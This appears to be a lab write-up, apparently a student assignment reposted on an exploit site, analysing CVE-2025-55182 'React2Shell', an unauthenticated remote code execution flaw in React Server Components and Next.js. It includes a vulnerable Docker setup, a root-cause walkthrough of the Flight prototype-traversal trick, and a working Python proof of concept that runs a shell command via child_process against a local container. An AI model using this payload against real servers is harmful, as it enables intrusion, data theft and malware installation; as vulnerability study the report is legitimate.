## https://sploitus.com/exploit?id=BEBC4DAE-79DC-5330-BAF0-012C7FAF4527
# CVE-2025-55182 React2Shell Analysis Report
> Sections required by the assignment guidelines are marked with โ(Required)โ.
# 1. Environment (Required)
## Dockerfile (Required)
This environment uses a custom Dockerfile based on the official Node.js Alpine image.
```dockerfile
FROM node:20-alpine
WORKDIR /app
COPY package.json ./
RUN npm install --legacy-peer-deps
COPY . .
EXPOSE 3000
CMD ["npm", "run", "dev"]
```
The Dockerfile builds a vulnerable React Server Components (RSC) and Next.js App Router environment.
The environment installs vulnerable versions of:
* React 19 RC
* React Server DOM Webpack
* Next.js 15.0.0
The vulnerable server runs in development mode using `npm run dev`.
The vulnerable server runs in development mode using `npm run dev`.
---
## Service Architecture (Required)
The environment operates using the following structure:
```plaintext
[Attacker / exploit.py]
โ
[Next.js App Router]
โ
[React Flight Protocol Parser]
โ
[React Server Components Runtime]
โ
[Node.js Runtime]
```
### Attacker / exploit.py
The attacker sends a specially crafted `multipart/form-data` request to the vulnerable Next.js application.
The malicious payload abuses the React Flight protocol deserialization process.
### Next.js App Router
The vulnerable application uses the Next.js App Router architecture.
The request is processed through the React Server Components pipeline.
### React Flight Protocol Parser
The Flight protocol deserializes complex React objects such as:
* Promise references
* Blob references
* Chunk references
* Server actions
* Circular references
The vulnerability occurs during this deserialization process.
### React Server Components Runtime
The React runtime processes attacker-controlled Flight payloads.
Unsafe property traversal and prototype access eventually allow attackers to hijack the Function constructor.
### Node.js Runtime
After successful exploitation, arbitrary JavaScript code executes inside the Node.js server environment.
This leads to Remote Code Execution (RCE).
---
## Images and Versions (Required)
| Component | Version |
| ------------------------ | --------- |
| Node.js | 20-alpine |
| Next.js | 15.0.0 |
| React | 19.0.0-rc |
| react-dom | 19.0.0-rc |
| react-server-dom-webpack | 19.0.0-rc |
The environment uses vulnerable React Server Components and Flight protocol implementations.
# 2. Root Cause (Required)
## Vulnerability Description (Required)
CVE-2025-55182, also known as React2Shell, is a critical Remote Code Execution (RCE) vulnerability affecting React Server Components and the React Flight protocol.
The vulnerability occurs during the deserialization process of attacker-controlled Flight protocol payloads.
The issue allows attackers to:
* create fake chunk objects
* abuse prototype traversal
* hijack the Function constructor
* execute arbitrary JavaScript code on the server
The vulnerability is particularly dangerous because exploitation can occur without authentication using a single crafted HTTP request.
Applications using vulnerable React Server Components and Next.js App Router configurations are directly exposed.
---
## Root Cause Analysis (Required)
The root cause of the vulnerability is unsafe handling of attacker-controlled object references during Flight protocol deserialization.
React Flight internally uses special reference strings such as:
```plaintext
$@0
$B1337
$1:__proto__:then
```
These references are recursively resolved during deserialization.
The vulnerable logic performs property traversal similar to:
```javascript
value[path[i]]
```
without validating whether the property belongs to the object itself.
As a result, attackers can access dangerous JavaScript prototype chain properties such as:
```plaintext
__proto__
constructor
prototype
```
This eventually allows prototype pollution and Function constructor hijacking.
### Fake Chunk Creation
The attacker first creates a fake React chunk object.
```json
{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "touch /tmp/success.txt",
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}
```
The critical field is:
```json
"status": "resolved_model"
```
The React runtime incorrectly trusts this field and treats the attacker-controlled object as a legitimate internal chunk object.
### Prototype Pollution
The payload:
```plaintext
$1:__proto__:then
```
causes the deserializer to traverse the JavaScript prototype chain.
Because the vulnerable code does not validate dangerous properties, the attacker gains access to:
```javascript
Chunk.prototype.then
```
This transforms the fake chunk into a thenable object.
### Function Constructor Hijacking
The payload:
```plaintext
$1:constructor:constructor
```
ultimately resolves to:
```javascript
Function
```
This replaces:
```javascript
response._formData.get
```
with the global JavaScript Function constructor.
As a result:
```javascript
Function(attacker_controlled_payload)
```
becomes possible.
### Blob Parsing Trigger
The payload:
```plaintext
$B1337
```
forces the React Flight parser into the Blob parsing logic.
During this process:
```javascript
response._formData.get(...)
```
is executed.
However, the attacker already replaced this function with the global Function constructor.
This finally results in arbitrary JavaScript execution inside the Node.js runtime.
---
## Vulnerability Trigger Process (Required)
The exploit process occurs in the following order:
```plaintext
Attacker Request
โ
Flight Payload Parsing
โ
Fake Chunk Creation
โ
Prototype Pollution
โ
Function Constructor Hijacking
โ
Blob Parsing Trigger
โ
Promise Resolution
โ
Remote Code Execution
```
The attacker first sends a crafted multipart Flight request.
The vulnerable server deserializes the malicious payload and recursively resolves attacker-controlled references.
Unsafe prototype traversal eventually allows the attacker to hijack the Function constructor.
During Promise resolution and Blob parsing, arbitrary JavaScript code is executed.
---
## Attack Flow and Impact (Required)
Successful exploitation allows attackers to execute arbitrary JavaScript code inside the Node.js server environment.
In this environment, the exploit executes:
```bash
touch /tmp/success.txt
```
Successful exploitation is verified when the following file exists inside the container:
```plaintext
/tmp/success.txt
```
In real-world environments, attackers could:
* execute arbitrary system commands
* download and execute malware
* steal sensitive server data
* pivot to internal infrastructure
* compromise backend systems
* abuse server-side rendering pipelines
The vulnerability is especially dangerous because it affects the React framework internals rather than application business logic.
This means a large number of applications may become vulnerable simply by using affected framework versions.
# 3. PoC (Required)
## PoC Overview (Required)
The Proof of Concept (PoC) was written in Python.
The exploit sends a malicious `multipart/form-data` request directly to the vulnerable Next.js application.
The PoC performs the following actions:
1. Creates a malicious Flight protocol payload
2. Constructs fake React chunk references
3. Triggers prototype traversal
4. Hijacks the Function constructor
5. Executes arbitrary JavaScript code inside the Node.js runtime
---
## PoC Code
```python
import requests
import uuid
boundary = "----WebKitFormBoundary" + uuid.uuid4().hex
payload = f'''------{boundary}
Content-Disposition: form-data; name="0"
{{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{{\\"then\\":\\"$B1337\\"}}","_response":{{"_prefix":"require('child_process').execSync('touch /tmp/success.txt')","_chunks":"$Q2","_formData":{{"get":"$1:constructor:constructor"}}}}}}
------{boundary}
Content-Disposition: form-data; name="1"
"$@0"
------{boundary}
Content-Disposition: form-data; name="2"
[]
------{boundary}--
'''
headers = {
"Content-Type": f"multipart/form-data; boundary={boundary}",
"Next-Action": "x"
}
response = requests.post(
"http://localhost:3000",
headers=headers,
data=payload
)
print(response.status_code)
print(response.text)
```
---
## Payload Analysis (Required)
The exploit payload uses multiple specially crafted Flight protocol references.
### `$1:__proto__:then`
| Part | Purpose |
| ----------- | -------------------------------- |
| `$1` | References chunk 1 |
| `__proto__` | Traverses the prototype chain |
| `then` | Retrieves `Chunk.prototype.then` |
This payload transforms the fake chunk into a thenable object.
---
### `$1:constructor:constructor`
| Part | Purpose |
| ------------- | --------------------------------------- |
| `$1` | References chunk 1 |
| `constructor` | Accesses object constructor |
| `constructor` | Resolves to global Function constructor |
This payload hijacks the JavaScript Function constructor.
---
### `$B1337`
The `$B` prefix forces the Flight parser into the Blob parsing logic.
During this process:
```javascript
response._formData.get(...)
```
is executed.
Because the attacker already replaced this method with the Function constructor, arbitrary JavaScript code executes.
---
### `$@0`
This payload creates a circular chunk reference.
Chunk 1 ultimately references Chunk 0 again.
This structure allows the deserializer to use the attacker-controlled fake chunk object during prototype traversal.
---
## PoC Code Execution Process (Required)
### Boundary Generation
The exploit first creates a random multipart boundary.
```python
boundary = "----WebKitFormBoundary" + uuid.uuid4().hex
```
This is required for constructing a valid multipart/form-data request.
### Fake Chunk Construction
The exploit constructs a malicious fake chunk object.
```json
"status":"resolved_model"
```
This causes the React runtime to treat the attacker-controlled object as a valid internal chunk.
### Prototype Traversal
The following payload:
```plaintext
$1:__proto__:then
```
forces the vulnerable parser to traverse the JavaScript prototype chain.
### Function Constructor Hijacking
The following payload:
```plaintext
$1:constructor:constructor
```
replaces the internal `get` method with the JavaScript Function constructor.
### Arbitrary Code Execution
The payload:
```javascript
require('child_process').execSync('touch /tmp/success.txt')
```
is eventually executed inside the Node.js runtime.
### Expected Result
Successful exploitation creates:
```plaintext
/tmp/success.txt
```
inside the vulnerable container.
# 4. Reproduction (Required)
## PoC and Exploit Execution Process (Required)
The complete exploit flow is summarized below:
```plaintext
Start Docker Environment
โ
Run Vulnerable Next.js Server
โ
Execute exploit.py
โ
Send Malicious Flight Payload
โ
Trigger Prototype Pollution
โ
Hijack Function Constructor
โ
Trigger Blob Parsing
โ
Execute Arbitrary Code
โ
Verify /tmp/success.txt
```
---
## Actual Exploit Execution Steps (Required)
### Building the Vulnerable Environment
Build the Docker image.
```bash
docker build -t rsc-vuln .
```
### Running the Vulnerable Container
Run the vulnerable container.
```bash
docker run -d -p 3000:3000 --name my-vuln-server rsc-vuln
```
The vulnerable Next.js server will run on:
```plaintext
http://127.0.0.1:3000
```
### Running the Exploit
Execute the PoC script.
```bash
python3 exploit.py
```
The exploit sends a malicious React Flight payload to the vulnerable Next.js server.
### Verifying Remote Code Execution
Verify whether the exploit successfully created the target file.
```bash
docker exec -it my-vuln-server ls -la /tmp/success.txt
```
Successful exploitation confirms that arbitrary code execution occurred inside the vulnerable container.
---
## Result Analysis (Required)
### Expected Output
During successful exploitation, the exploit should trigger React Flight deserialization and prototype traversal.
The vulnerable server processes the malicious Flight payload and executes attacker-controlled JavaScript code.
### Successful Exploitation Verification
Successful exploitation is confirmed when the following file exists:
```plaintext
/tmp/success.txt
```
Example output:
```plaintext
-rw-r--r-- 1 root root 0 Jan 1 00:00 /tmp/success.txt
```
This confirms that arbitrary commands were executed successfully inside the vulnerable Node.js environment.
---
## Screenshots (Required)
The following screenshots were included in the `screenshots/` directory:

